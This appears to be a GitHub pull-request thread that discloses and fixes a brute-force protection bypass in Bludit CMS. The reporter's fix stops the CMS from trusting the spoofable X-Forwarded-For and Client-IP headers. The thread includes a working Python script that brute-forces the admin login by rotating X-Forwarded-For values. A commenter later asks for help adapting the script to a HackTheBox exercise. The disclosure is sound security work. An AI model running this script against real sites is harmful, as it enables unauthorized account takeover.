Remove use of headers that can be used to bypass anti-brute force controls

[rastating]

In bl-kernel/security.class.php, there is some code that will check the number of incorrect login attempts made by a host. If the host makes 10 incorrect attempts, they will be temporarily blocked in order to mitigate brute force attempts.

Due to the way the IP address detection is handled, the mechanism can be completely bypassed. The X-Forwarded-For and Client-IP headers are both checked for (presumably in order to try and detect the IP address of people behind proxies). Unfortunately, both of these headers are easily spoofed, and for an attacker that is running an automated brute force, this will make the process significantly easier than say switching between VPNs as each address gets banned.

I have included a proof of concept demo below in which you can see a total of 51 requests being made (far exceeding the limit) and successfully recovering my admin password:

This is done by using unique X-Forwarded-For addresses for each request. As there is no validation, simply using the value of the password being attempted will work, allowing for a brute force without the risk of locking anyone out at all, as can be seen when inspecting the log file after the brute force has been completed.

Although with this change, it means users who are using a shared IP address via a proxy may be blocked if another person using the same IP is trying to brute force the login page, it will make an automated attack significantly more difficult for an attacker and require that they have multiple IP addresses that they can send traffic from.

[rastating]

If you'd like to test this yourself, the script I wrote to run the test in the recording can be found below. It requires you to set the host and username variables at the top of the script and to replace adminadmin with whatever password you intend to test against:

#!/usr/bin/env python3
import re
import requests

host = 'http://192.168.194.146/bludit'
login_url = host + '/admin/login'
username = 'admin'
wordlist = []

# Generate 50 incorrect passwords
for i in range(50):
    wordlist.append('Password{i}'.format(i = i))

# Add the correct password to the end of the list
wordlist.append('adminadmin')

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

[dignajar]

Thank you for your explanation and the fix for the vulnerability. I would like to have more people like you.

[rastating]

You're welcome! Us open-source folk have to look out for one another, right? 😃

[impshum]

This is good to know. I'm currently building a site using Bludit.

Thanks for the fix.

[sasha-0077]

thanks for your work
i am trying the script and when i add the password word-list direction it looks like its not reading it its just trying the direction as a password and i do a lot of search to do that but i didn't get any more use full information
by the way I'm working on hackthebox blunder machine it use bludit website